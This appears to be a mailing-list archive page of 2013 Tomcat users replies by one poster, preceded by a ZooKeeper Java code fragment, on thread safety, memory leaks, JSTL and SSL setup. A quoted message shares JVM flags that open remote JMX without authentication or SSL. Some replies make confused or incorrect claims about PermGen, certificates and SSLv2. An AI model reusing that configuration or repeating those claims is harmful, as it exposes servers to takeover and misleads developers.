 LOG.info(Session: 0x + Long.toHexString(getSessionId()) +  
 closed);
 }
 --
 org.apache.zookeeper.ClientCnxn
  public void close() throws IOException {
 if (LOG.isDebugEnabled()) {
 LOG.debug(Closing client for session: 0x
   + Long.toHexString(getSessionId()));
 }
 try {
 RequestHeader h = new RequestHeader();
 h.setType(ZooDefs.OpCode.closeSession);
 submitRequest(h, null, null, null);
 } catch (InterruptedException e) {
 // ignore, close the send/event threads
 } finally {
 disconnect();
 }
 }
  
  
  public void disconnect() {
 if (LOG.isDebugEnabled()) {
 LOG.debug(Disconnecting client for session: 0x
   + Long.toHexString(getSessionId()));
 }
 sendThread.close();
 eventThread.queueEventOfDeath();
 }
 -
  
 
 org.apache.zookeeper.ClientCnxn.SendThread
  void close() {
 state = States.CLOSED;
 clientCnxnSocket.wakeupCnxn();
 }
  
  
 @Override
 public void run() {
 clientCnxnSocket.introduce(this,sessionId);
 clientCnxnSocket.updateNow();
 clientCnxnSocket.updateLastSendAndHeard();
 int to;
 long lastPingRwServer = System.currentTimeMillis();
 while (state.isAlive()) {
 try {
 if (!clientCnxnSocket.isConnected()) {
 if(!isFirstConnect){
 try {
 Thread.sleep(r.nextInt(1000));
 } catch (InterruptedException e) {
 LOG.warn(Unexpected exception, e);
 }
 }
 // don't re-establish connection if we are closing

RE: WebSockets Thread Safety question

[Martin Gainty]

/java/utiljavap Collections | grep synchronized
public static java.util.Collection synchronizedCollection(java.util.Collecti
on);
static java.util.Collection synchronizedCollection(java.util.Collection, jav
a.lang.Object);
public static java.util.Set synchronizedSet(java.util.Set);
static java.util.Set synchronizedSet(java.util.Set, java.lang.Object);
public static java.util.SortedSet synchronizedSortedSet(java.util.SortedSet)
;
public static java.util.List synchronizedList(java.util.List);
static java.util.List synchronizedList(java.util.List, java.lang.Object);
public static java.util.Map synchronizedMap(java.util.Map);
public static java.util.SortedMap synchronizedSortedMap(java.util.SortedMap)
;

use java.util.Collections.synchronizedList 

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.


 From: ch...@derham.me.uk
 Date: Mon, 3 Jun 2013 07:42:01 -0300
 Subject: Re: WebSockets Thread Safety question
 To: users@tomcat.apache.org
 
  When I use the syntax from the samples in the onTextMessage() method, I get
  ConcurrentModificationException if I have more than one client sending data
  to the server at the same time:
 
  for(MyMessageInbound mmib: mmiList){
  CharBuffer buffer = CharBuffer.wrap(cb);
  mmib.myoutbound.writeTextMessage(buffer);
  mmib.myoutbound.flush();
  }
 
 
  Changing it to the following works fine:
 
  for(int i = 0; i  mmib.size(); i++) {
  MyMessageInbound mmib = mmiList.get(i);
  CharBuffer buffer = CharBuffer.wrap(cb);
  mmib.myoutbound.writeTextMessage(buffer);
  mmib.myoutbound.flush();
  }
 
  However, this approach is not as efficient as to use an Iterator, unless I
  clone the mmiList Collection to iterate over it...
 
 Can you explain where is the in-efficiency?
 
 Thanks
 
 Chris
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: checkThreadLocalMapForLeaks: com.sun.xml.bind.v2.runtime.Coordinator

[Martin Gainty]

Hi Jesse

you can configure your customised Jaxb factory implementor by implementing a 
jaxb.properties file
with a javax.xml.bind.context.factory=value

javax.xml.bind.context.factory=org.eclipse.persistence.jaxb.JAXBContextFactory

be aware with key=value value is the name of the class that implements the 
createContext  for Jaxb
http://docs.oracle.com/javaee/5/api/javax/xml/bind/JAXBContext.html

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

 
 Date: Sun, 19 May 2013 12:39:12 -0400
 Subject: checkThreadLocalMapForLeaks: com.sun.xml.bind.v2.runtime.Coordinator
 From: jie...@gmail.com
 To: users@tomcat.apache.org
 
 Greetings,
 
 I am using Apache Tomcat 7.0.40, via IBM Java 7 SR2. I am seeing the
 following on Tomcat shutdown:
 
 org.apache.catalina.loader.WebappClassLoader.checkThreadLocalMapForLeaks
 The web application [] created a ThreadLocal with key of type
 [com.sun.xml.bind.v2.runtime.Coordinator$1] (value
 [com.sun.xml.bind.v2.runtime.Coordinator$1@f9b00906]) and a value of
 type [java.lang.Object[]] (value [[Ljava.lang.Object;@3d8d9b93]) but
 failed to remove it when the web application was stopped. Threads are
 going to be renewed over time to try and avoid a probable memory leak.
 
 When I inspect the libraries within the application I find:
 
 $ grep com.sun.xml.bind.v2.runtime.Coordinator *
 Binary file jaxb-impl-2.2.1.1.jar matches
 
 Apache Maven dependency:tree shows that this is coming from Apache
 Wink (wink-common - wink-client).
 
 Is this JAXB ThreadLocal something that Apache Tomcat ought to protect me 
 from?
 
 Thank you,
 -Jesse
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: getting the request that created the session

[Martin Gainty]

org.apache.catalina.valves.RemoteIPValve getRemoteIpHeader?
Martin
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  Date: Sat, 27 Apr 2013 23:08:31 +0200
 Subject: getting the request that created the session
 From: rosenberg.l...@gmail.com
 To: users@tomcat.apache.org
 
 Hi,
 
 is there any possibility to get the first request from a session (or any
 request from a session) from the HttpSessionListener.
 Background, I want to count sessions by top level domains. I'm doing it now
 in a combination of filter and listener. Filter for new sessions, putting a
 mark for already counted sessions, and listener for destroyed session.
 However, I would like to get rid of the Filter, if its possible somehow.
 For that, I need to get user's ip adress somehow.
 
 thanks in advance
 Leon
  

RE: JSTL XML Basic Question

[Martin Gainty]

Jerry

You'll need core taglib and xml taglib e.g. 
http://www.tutorialspoint.com/jsp/jstl_xml_out_tag.htm
declaration:%@ taglib prefix=c uri=http://java.sun.com/jsp/jstl/core; %
%@ taglib prefix=x uri=http://java.sun.com/jsp/jstl/xml; %
 use core taglib to set var:c:set var=xmltext
  books
book
  namePadam History/name
  authorZARA/author
  price100/price
/book
book
  nameGreat Mistry/name
  authorNUHA/author
  price2000/price
/book
  /books
/c:set
 use xml taglib to set parse var:
x:parse xml=${xmltext} var=output/
 use xml taglib to set output the parsed textx:out 
select=$output/books/book[1]/name /
 http://www.tutorialspoint.com/jsp/jstl_xml_out_tag.htm
Martin__ 
Jogi és Bizalmassági kinyilatkoztatás/Verzicht und 
Vertraulichkeitanmerkung/Note de déni et de confidentialité
 Ez az
üzenet bizalmas.  Ha nem ön az akinek szánva volt, akkor kérjük, hogy
jelentse azt nekünk vissza. Semmiféle továbbítása vagy másolatának
készítése nem megengedett.  Ez az üzenet csak ismeret cserét szolgál és
semmiféle jogi alkalmazhatósága sincs.  Mivel az electronikus üzenetek
könnyen megváltoztathatóak, ezért minket semmi felelöség nem terhelhet
ezen üzenet tartalma miatt.

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  Date: Sat, 20 Apr 2013 13:14:21 -0500
 Subject: JSTL XML Basic Question
 From: 2ndgenfi...@gmail.com
 To: users@tomcat.apache.org
 
 I have been searching for several hours for a basic JSTL answer with no
 luck.  From what I can tell, JSTL is under the umbrella of Tomcat.
 Hopefully someone can help me out.
 
 I simply want to use an existing already-parsed DOM (org.w3c.dom.Document
 variable) with JSTL XML tags.  In other words, I want to skip the x:parse
 step and just tell x:out and all of the other x tags to pull data from my
 pre-existing pre-parsed DOM:
 
Document myDOM;  // already built by another part of the code
 
 I understand basic xpath stuff.  But I'm not sure how to tell it to use a
 standard local java variable for the DOM.
 
 I've tried   x:out select=$myDOM/a/b/  and x:out
 select=${myDOM}/a/b/
 
 Both give me errors that seem to say it doesn't find a DOM.
 
 Every example I can find always assumes I want to start with a true
 non-parsed XML document.
 
 I'm sure I'm missing something obvious.  But can someone please help me out
 with the correct syntax?
 
 Thanks.
 
 Jerry
  

RE: RE : Tomcat 6.0.35 Crashed again

[Martin Gainty]

you need to do take a look at the loaded JSF webapps and find outwho is 
acquiring  a resource and not closing the resource
who is acquiring large amounts of heap and not releasingbe aware any reference 
to an any object in another class gives the class the right to be placed into 
PermGenHibernate with cglib proxies are notorious memory hogs awatch your 
PermGen get pegged when Hibernate and cglib proxies are loadedStatics are 
another  set of culprits of of heap usage 
Remember all long lived heap objects are eventually placed into Permgen Find 
the tools to track eden heap, tenured heap and PermGen 
http://www.integratingstuff.com/2011/07/24/understanding-and-avoiding-the-java-permgen-space-error/
 get familiar with taking heap dumps with jmap and analyzing with 
jhathttp://javarevisited.blogspot.com/2011/05/java-heap-space-memory-size-jvm.html
 Martin 

__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  Date: Thu, 11 Apr 2013 11:40:46 -0400
 Subject: Re: RE : Tomcat 6.0.35 Crashed again
 From: smithh032...@gmail.com
 To: users@tomcat.apache.org
 
 On Thu, Apr 11, 2013 at 10:41 AM, Mark H. Wood mw...@iupui.edu wrote:
 
  Really, no one else can tell you what settings to use.  The best we
  can hope for is some accepted rules of thumb *as starting points* for
  further tuning.
 
 
 +1 to Dan, Neven, and Mark's responses. Please consider-or-do 'everything'
 that they mentioned/recommended.
 
 I did want to share my java settings for my
 currently-considered-a-low-scale JSF web app running on Windows Server 2008
 R2 64bit server with 32GB RAM.
 
 -XX:HeapDumpPath=D:\apache-tomee-plus-1.6.0-SNAPSHOT\temp
 -XX:+HeapDumpOnOutOfMemoryError
 -Djava.awt.headless=true
 -Dcom.sun.management.jmxremote.port=422
 -Dcom.sun.management.jmxremote.ssl=false
 -Dcom.sun.management.jmxremote.authenticate=false
 -Xms1024m
 -Xmx1024m
 -XX:MaxPermSize=384m
 -XX:+UseTLAB
 -XX:+UseConcMarkSweepGC
 -XX:+CMSClassUnloadingEnabled
 
 I am very pleased with the GC performance of my app, and I do like to
 monitor the performance of the app via JMX remote connection via Java
 Visual VM. My app runs between 200m to 500m, but I am keeping Xms/Xmx=1024m
 just to see if I ever get an OOME; so far, so good (never experienced an
 OOME), but recently, I did experience some unexpected/unwanted behavior
 with one of my @Schedule processes which was attempting to sync some data
 from database to/with Google Calendar, and google Calendar service returned
 google calendar error 503, and I recognized that the memory got up to 500m,
 and the google calendar error 503 did not resolve itself over an hour
 (@Schedule executes every 2 to 4 minutes, if error occurs, then data is
 appended to the queue for later retry attempt). I never seen that behavior
 and I don't know if I will see it again; i wish I would have done a 'heap
 dump' instead of a 'stop' tomee/tomcat. Everyday, I listen and read these
 questions/responses on tomcat list, and I can't believe that I forgot to do
 a 'heap dump'. :(
 
 Also, please note that I occasionally stop-deploy-and-start tomee/tomcat
 almost-on-a-daily-basis to deploy new app-or-configuration-or-library
 updates; also, the app or tomee (or tomcat) seem to accumlate threadlocals
 over time, and if uptime is  1 day, then I 'think' I see that memory is
 not released, and I think eventually as uptime increases, then the
 app/tomee/tomcat will result in OOME. :)
 
 At any rate, hope this helps.
 
 Howard
  

RE: Better SSL connector setup

[Martin Gainty]

Identification of keys and supported ciphers are an important for Key Exchange
But before that happensThe certificates attributes are the only means the 
CA-Authority can verify the the name in the cert
The certificate attributes should contain
1)1 and only 1 Hostname to contact
2)Identification information from a DN in LDAP or a suitably unique Name 
Service Server (ADS)allowing verification of client to a 'Name 
Service'http://docs.oracle.com/cd/E19575-01/820-3885/gimog/index.html

Allowing your cert  to authenticate to n hosts invites 2n as many potential DOS 
attacks
Not requiring DN would negate the CA-Authority ability to verify DN CN == 
SSL-Host.
Think of online banking and clients need to circumvent forged sites as 'The 
official bank site' to send your money
If you are FE with Apache you will want to configure in 
mod-sslhttp://www.modssl.org/

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.


  Date: Sun, 7 Apr 2013 11:40:24 -0700
 From: its_toas...@yahoo.com
 To: users@tomcat.apache.org
 Subject: Re: Better SSL connector setup
 
 Some notes from October 2011 referenced below:
 
 On 4/7/2013 8:47 AM, Christopher Schultz wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA256
 
  Kevin,
 
  On 4/6/13 10:10 PM, Kevin Jenkins wrote:
  I have a server that has two hosts: First:
  http://masterserver2.raknet.com/
 
  Second (using alias) https://lobby3.raknet.com
  https://milestone.lobby3.raknet.com:444/
  https://milestone.lobby3.raknet.com:444/
 
  I would like have access be on these specific URLS. Right now you
  can use untrusted URLs, such as https://masterserver2.raknet.com/
  https://milestone.lobby3.raknet.com/
 
  Additionally, I would like to access milestone.lobby3.raknet.com on
  port 443 rather than 444 (so that 443 does not display a warning
  like it does now).
 
  I setup two connectors because I did not know how else to specify
  there are two ssl certificate files
 
  If you want two separate hostnames served under HTTPS and you:
 
  a. Don't have a wildcard or other special type of certificate
  or
  b. Don't have Server Name Indication capabilities
 
 
  From the list archives:
 
 http://mail-archives.apache.org/mod_mbox/tomcat-users/201110.mbox/%3c1318710394.66976.yahoomail...@web125511.mail.ne1.yahoo.com%3E
 
 Wildcard certificates would work in this case because the hosts are part 
 of the same domain.
 
 SNI is apparently client-side only for Java.
 
  ...then you will need to configure a Connector for each hostname on
  a separate interface/port combination with separate certificates.
 
  The easiest way to do this is to set up a second interface with a
  separate IP address. This is usually trivial to do, and it doesn't
  really interfere with networking on the server. Just create a second
  interface with a second IP address, map DNS properly, and then set up
  your web server to bind specifically to the second IP address for the
  second hostname's SSL virtual host.
 
 
 In a Tomcat-only setup this is the way to go. Secondary or virtual IP 
 addresses are easy to set up.
 
  Your Connectors look just fine (other than the use of port 444, of
  course). Once you have a second interface/IP, you'll want to use the
  address attribute of the Connector to choose the interface to
  listen on. I would choose one Connector to listen on *all*
  interfaces to be a catch-all in case your IP address(es) change(s) and
  you forget to re-configure everything: a security warning due to a
  mismatched-host is better for users than an unreachable host.
 
  - -chris
 
 The other solution is to front the Tomcat systems with an Apache HTTPD 
 server and use named virtual hosts in SSL. Apparently the configuration 
 checking routine throws a warning on startup, but the actual 
 configuration works (on Apache HTTPD 2.2, I've not tried 2.4).
 
 . . . . just my two cents.
 /mde/
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: IIS and Tomcat workers groups

[Martin Gainty]

The only way I know how is to have IIS route all requests to a Proxy (such as 
Squid)

http://wiki.squid-cache.org/Features/Redirectors

The Proxy Server (Squid) can redirect to LB all  requests for GroupNode1 and 
GroupNode2 

Saludos Cordiales desde EEUU

Martin 

__ 
Porfavor..no altere ni interrumpir esta communicacion..Gracias


 Date: Thu, 4 Apr 2013 10:14:50 +0100
 From: miguel_3_gonza...@yahoo.es
 Subject: IIS and Tomcat workers groups
 To: users@tomcat.apache.org
 
 Dear all,
  
   We currently have an IIS 6 fronting several Tomcat 6 containers with a list 
 of workers for each redirection we want to forward from IIS to each tomcat. 
  
   We are thinking of migrating to IIS 7.5 and Tomcat 7. Also we would like 
 that two of the nodes share the same redirection and so we can balance the 
 load to two servers instead of having one server.   Is it possible that two 
 of the nodes are balanced in a group while the other nodes are stand-alone?
  
   Many thanks
  
   Miguel
  

RE: Analyzing Connection Pool Errors/Leaks

[Martin Gainty]

Never met GK but there are a few things that he needs to implement to make 
Hibernate Production-Ready

1)Deprecate the home-made bag classes ..collection classes have been out for 
the better part of 5 years ..and force the op
to upgrade their JDK to AT LEAST 1.5 to use ArrayListBagClass..Bag classes 
add unneccesary load and overhead
and any overhead is bad
 
2)Close your LRU ResultSets

3)Close your LRU StatementHandles

4)Close your LRU Cursors

5)Close your LRU Connections

6)Allow hinting..I dont want Any Hibernate query to do FTS when there is a 
perfectly good index waiting to be used

Why the rant: 1 1/2 years ago I visited a high-profile client that was 
processing a million transactions a day and Hibernate was 
mucking the process so intrusively the client said rewrite 1000_ Hibernate 
calls to straight queries
 
to quote a Cambridge Maven..Hibernate is more trouble than its worth

My 2 cents


Martin Gainty 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité
.

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  


 Subject: Re: Analyzing Connection Pool Errors/Leaks
 From: dmik...@vmware.com
 Date: Mon, 1 Apr 2013 17:11:50 -0400
 To: users@tomcat.apache.org
 
 On Apr 1, 2013, at 4:18 PM, David Landis wrote:
 
  Thanks for the response, see my comments inline below.
  
  
  On Mon, Apr 1, 2013 at 3:49 PM, Daniel Mikusa dmik...@vmware.com wrote:
  
  On Apr 1, 2013, at 3:31 PM, David Landis wrote:
  
  Hi guys,
  
  When running a performance test on my system it starts fine, but after a
  while I start getting errors in my application log such as (see the
  bottom
  for full stack trace):
  
  2013-03-29 16:38:54,778 ERROR
  [org.hibernate.engine.jdbc.spi.SqlExceptionHelper] -
  [SimpleAsyncTaskExecutor-12842] - [SimpleAsyncTaskExecutor-12842]
  Timeout:
  Pool empty. Unable to fetch a connection in 30 seconds, none
  available[size:80; busy:0; idle:0; lastwait:3].
  
  This means you have no connections in your pool and it's unable to create
  a new connection to your database.
  
  
  
  OK, I'll have to investigate the DB setting more thoroughly. The maximum
  sessions and processes in Oracle are higher than we were using for the test
  though (several hundred).
  
  
  
  
  
  Questions:
  
  1.) I'm a little confused about what it means if no connections are
  available and yet none are busy nor idle. What are the other
  available
  states?
  
  The pool is empty. Further more the error above means that it can't
  create a new connection either. Maybe your network failed? or the DB
  kicked off all your application's connections?
  
  
  
  Actually Oracle was showing 70+ inactive sessions for my app even though
  the connection pool was showing empty.
 
 Possible you are hitting a bug.
 
 You might also want to try an upgrade of Tomcat. You're a couple versions 
 back at 7.0.32. You can see what was fixed by searching for jdbc-pool in 
 the ChangeLog.
 
 https://tomcat.apache.org/tomcat-7.0-doc/changelog.html
 
 Dan
 
 
  
  
  Were you ever able to get a connection to the DB? If you restart Tomcat,
  can you get connections to the DB again?
  
  
  
  Yes, restarting Tomcat results in a fresh pool of DB connections and the
  70+ inactive sessions on the DB side are gone and replaced by 10 which is
  the initial size of the pool.
  
  
  
  
  Also, are there any limits on your DB user's account that might cause
  problems with your performance tests?
  
  
  
  Not that I know of, but I'll look further. I was expecting problems with
  the perf test eventually b/c it was set to simulate a couple hundred users
  and I only maxActive set to 80. That is fine. I'm more concerned with why
  the connection pool didn't eventually recover.
  
  
  
  
  
  2.) My other point of confusion is that assuming there is a connection
  leak
  in the application, shouldn't setting removeAbandoned=true cause the DB
  connections to eventually be recovered?
  
  Yes.
  
  What I am seeing is that even after
  a couple days of no application usage now I'm still getting

RE: OCSP with TOMCAT 7

[Martin Gainty]

so you want Tomcat7 to act as an OCSP Responder?
 
download and install ocsp daemon ..this is not trivial as you will need to be 
able to communicate to a working LDAP server
http://www.openca.org/projects/ocspd/

configure your servlet to serve its requests to ocsp-daemon calls..
configure the servlet to serve the response with the results from the 
ocsp-daemon

Please explain why you want to FE the ocspd request instead of calling the 
daemon directly?

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  


 Date: Thu, 21 Mar 2013 10:08:08 +0100
 From: a...@ice-sa.com
 To: users@tomcat.apache.org
 Subject: Re: OCSP with TOMCAT 7
 
 Amit A wrote:
  Could not find anything achived on this topic
  Search query: http://marc.info/?l=tomcat-userw=2r=1s=tomcat+ocspq=t
  
  Further pointers please?
 
 15/03/2013, subject Standard or OCSP Native Lib?, Nick Williams ?
 
  
  
  On Wed, Mar 20, 2013 at 4:23 PM, André Warnier a...@ice-sa.com wrote:
  
  Amit A wrote:
 
  I need to enable OCSP on my application which is running Tomcat 7.0.29.
  Looked up the documentation but did not find quite much :
  http://tomcat.apache.org/**tomcat-7.0-doc/ssl-howto.htmlhttp://tomcat.apache.org/tomcat-7.0-doc/ssl-howto.html
 
  1. Is OCSP with just tomcat actually possible? Do we need a external
  module/software?
  2. Has anyone implemented/Configured OCSP with Tomcat? I am looking for
  the
  nitty gritties here.
 
 
  Search the list archives. There was a question/response about this
  exact subject just a few days ago.
 
 
  --**--**-
  To unsubscribe, e-mail: 
  users-unsubscribe@tomcat.**apache.orgusers-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: SSL Best Practices

[Martin Gainty]

1)Have you ever tried to coerce IE to accept a self-signed cert
2)if you purchase a pfx with a self-signed certificate sold to you by 
chris_is_a_hacker.com for 1.00 then who do you think can break it

The cert allows browser to contact the sites SSL connector..by presenting 
credentials usually from a Name Server such as ADS or LDAP

the real work involves breaking the algorithm implemented by the key

in order  to establish Key exchange on a SSLv2 transport

I sincerely doubt even chris_is_a-hacker can break any of the RSA algorithms 
implemented by the key inside a versign.pfx 
 
'Nuf Said
Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité

Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
quel effet légalement obligatoire. Étant donné que les email peuvent facilement 
être sujets à la manipulation, nous ne pouvons accepter aucune responsabilité 
pour le contenu fourni.

  


 From: jeffrey.har...@mantech.com
 To: users@tomcat.apache.org; ch...@derham.me.uk
 Date: Tue, 19 Mar 2013 06:04:52 -0400
 Subject: RE: SSL Best Practices
 
 
 
  -Original Message-
  From: cjder...@gmail.com [mailto:cjder...@gmail.com] On Behalf Of chris
  derham
  Sent: Tuesday, March 19, 2013 1:58 AM
  To: Tomcat Users List
  Subject: Re: SSL Best Practices
 
   If the system is only for testing, or communicates with a limited
   number of systems (i.e., it is a firewalled backend system that only
   communicates with a front-end system), then again, a self-signed
  certificate would be fine.
 
  +1
 
   I do agree that if this is a public facing system, or one in an
   organization with a large number of users that does not have its own
   CA infrastructure, then a commercial certificate would be the best
  choice.
 
  Commercial certificate authorities are actively targeted by hackers,
  and when they are broken into, the trust each os has configured of such
  certificates can cause issues. The recent google ssl certificate issue
  shows what happens when things go wrong. If users will access the site
  via a browser, then the browser warning will confuse them/make them
  used to ignoring security warnings. For applications communicating with
  each other, a self signed certificate will actually be more secure than
  a certificate authority issued certificate - assuming you trust your
  internal security more than you trust that of a commercial certificate
  authority. It all depends on what the certificate will be used for.
 
  Chris
 
 
 What you say is all true, but if the public is accessing the site,
 there is no real alternative to a commercial certificate, because there will
 be no way to ascertain the trust of the site at all, and as you say users 
 will be
 confused by the browser warnings.
 
 Unfortunately, the security of the Internet is dependent on a relatively 
 handful
 of commercial certificate authorities, several of whom have either been 
 hacked,
 or who have not properly vetted requesters for certificates.
 
 Jeffrey Harris
 
 This e-mail and any attachments are intended only for the use of the 
 addressee(s) named herein and may contain proprietary information. If you are 
 not the intended recipient of this e-mail or believe that you received this 
 email in error, please take immediate action to notify the sender of the 
 apparent error by reply e-mail; permanently delete the e-mail and any 
 attachments from your computer; and do not disseminate, distribute, use, or 
 copy this message and any attachments.
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Upgrading Tomcat in the customer base

[Martin Gainty]

Patrick if client and tc-server are on same domain..how about implementing 
Windows Authentication in TC?
When client authenticates to the Domain all of the TC shares are restored 
(including TC share) 
http://tomcat.apache.org/tomcat-7.0-doc/windows-auth-howto.html

HTHMartin __ 
..place disclaimer here...

  From: pflah...@rampageinc.com
